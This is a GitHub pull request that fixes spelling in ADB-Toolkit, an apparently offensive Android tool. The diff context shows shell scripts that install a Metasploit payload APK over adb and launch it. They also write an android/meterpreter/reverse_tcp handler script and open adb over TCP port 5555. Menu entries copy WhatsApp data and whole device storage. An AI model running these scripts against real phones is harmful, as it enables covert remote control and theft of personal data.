Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

grammar-corrections #10

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
Open
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
22 changes: 11 additions & 11 deletions modules/2opt2
Original file line number Diff line number Diff line change
Expand Up @@ -103,10 +103,10 @@ apk_install () {
fi
}

start_listner () {
start_listener () {

adb -s $devv shell monkey -p com.metasploit.stage -c android.intent.category.LAUNCHER 1 >/dev/null 2>&1 | echo -e "\e[1;93mLaunching the PAYLOAD.\e[0m"; echo -e "\n\e[1;92mDone\n"
echo -e "\e[1;92mStarting the MSF listner\n"
echo -e "\e[1;92mStarting the MSF listener\n"
time=$(date +"%T")
echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost1\nset LPORT $lport1\nexploit" > $PWD/metasploit/.exploit-$time.rc
msfconsole -q -r $PWD/metasploit/.exploit-$time.rc
Expand All @@ -131,11 +131,11 @@ dev_1_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done
}
Expand All @@ -157,11 +157,11 @@ dev_2_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done
}
Expand All @@ -183,11 +183,11 @@ dev_3_payload_create () {
esac
done
while true; do
read -p $'\e[93;1mDo you want to start the MSF listner.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
read -p $'\e[93;1mDo you want to start the MSF listener.\e[1;97m (Y/n) \e[91;1m? : \e[1;93m' yn
case $yn in
[Yy]* ) start_listner; break;;
[Yy]* ) start_listener; break;;
[Nn]* ) clear && bash modules/function2.sh;;
* ) start_listner; break;;
* ) start_listener; break;;
esac
done

Expand Down
11 changes: 4 additions & 7 deletions modules/2opt4
Original file line number Diff line number Diff line change
Expand Up @@ -7,13 +7,10 @@ fi

clear
echo -e "\n\e[1;93m

__ __ __ _______ _______ _______ _______
| |__|.-----.| |_.-----.-----.-----.----. | _ | | |_ _| |
| | ||__ --|| _| -__| | -__| _| | | | | | | | - |
|__|__||_____||____|_____|__|__|_____|__| |___|___|_______| |___| |_______|


\e[0m"
lhost_taker () {

Expand All @@ -37,13 +34,13 @@ lport_taker () {

}

listner_creator () {
listener_creator () {

echo -e "use exploit/multi/handler\nset PAYLOAD android/meterpreter/reverse_tcp\nset LHOST $lhost2\nset LPORT $lport2\nexploit" > metasploit/.exploit.rc

}

start_listner () {
start_listener () {

while true; do
read -p $'\n\e[93;1mDo you want to start the MSF Listener.\e[1;97m (Y/N) \e[91;1m? : \e[1;93m' yn
Expand All @@ -62,8 +59,8 @@ main () {

lhost_taker
lport_taker
listner_creator
start_listner
listener_creator
start_listener

}

Expand Down
4 changes: 2 additions & 2 deletions modules/function2.sh
Original file line number Diff line number Diff line change
Expand Up @@ -35,13 +35,13 @@ option2_list () {
echo -e "\e[93mMade with LOVE by \e[1;91mASHWINI SAHU\e[0m\n\n"
echo -e "\e[1;4;93mCHOOSE THE OPTIONS GIVEN BELOW\e[0m\n\n"
echo -e "\e[1;93m1. \e[1;92mSHOW CONNECTED DEVICES"
echo -e "\e[1;93m2. \e[1;92mCREATE AND INSTALL METAPLOIT PAYLOAD \e[1;93m( .apk )"
echo -e "\e[1;93m2. \e[1;92mCREATE AND INSTALL METASPLOIT PAYLOAD \e[1;93m( .apk )"
echo -e "\e[1;93m3. \e[1;92mLAUNCH THE METASPLOIT PACKAGE \e[1;93m( .apk )"
echo -e "\n\e[1;93m4. \e[1;92mLAUNCH THE METASPLOIT LISTNER \e[1;93m( .apk )"
echo -e "\n\e[1;93m5. \e[1;92mGO BACK TO ADB-Toolkit"
echo -e "\e[1;92mEXIT or press Ctrl+c\n"
echo -e $revised
read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options2
read -p $'\n\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options2

}

Expand Down
2 changes: 1 addition & 1 deletion modules/funtion.sh
Original file line number Diff line number Diff line change
Expand Up @@ -65,7 +65,7 @@ echo -e "\e[1;93m21. \e[1;92mCOPY ALL WHATSAPP DATA"
echo -e "\e[1;93m22. \e[1;92mCOPY ALL DEVICE STORAGE ( Takes time ) \e[1;93mA. \e[1;92mABOUT AUTHOUR "
echo -e "\e[1;93m23. \e[1;92mCOPY A SPECIFIED FILE OR FOLDER \e[1;91mEXIT or press Ctrl+c\n"
echo -e $revised
read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTED NUMBER\e[0m\e[24;1;97m : ' options
read -p $'\e[1;4;91mSELECT ONE OF THE OPTIONS WITH THE RESPECTIVE NUMBER\e[0m\e[24;1;97m : ' options

}

Expand Down
6 changes: 3 additions & 3 deletions modules/opt16
Original file line number Diff line number Diff line change
Expand Up @@ -61,7 +61,7 @@ remote_shell () {
dev_1_remo () {

devvv=$(echo "$dev_1")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_1 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_1 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_1 connect $dev_ip) > /dev/null 2>&1
Expand All @@ -79,7 +79,7 @@ dev_1_remo () {
dev_2_remo () {

devvv=$(echo "$dev_2")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_2 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_2 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_2 connect $dev_ip) > /dev/null 2>&1
Expand All @@ -98,7 +98,7 @@ dev_2_remo () {
dev_3_remo () {

devvv=$(echo "$dev_3")
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Tookit is installed.\n"
echo -e "\n\e[1;93mMake sure that the device \e[1;91m$mod_3 \e[1;93mis connected to the same network in which ADB-Toolkit is installed.\n"
ip_finder
adb -s $dev_3 tcpip 5555 > /dev/null 2>&1
connect_msg=$(adb -s $dev_3 connect $dev_ip) > /dev/null 2>&1
Expand Down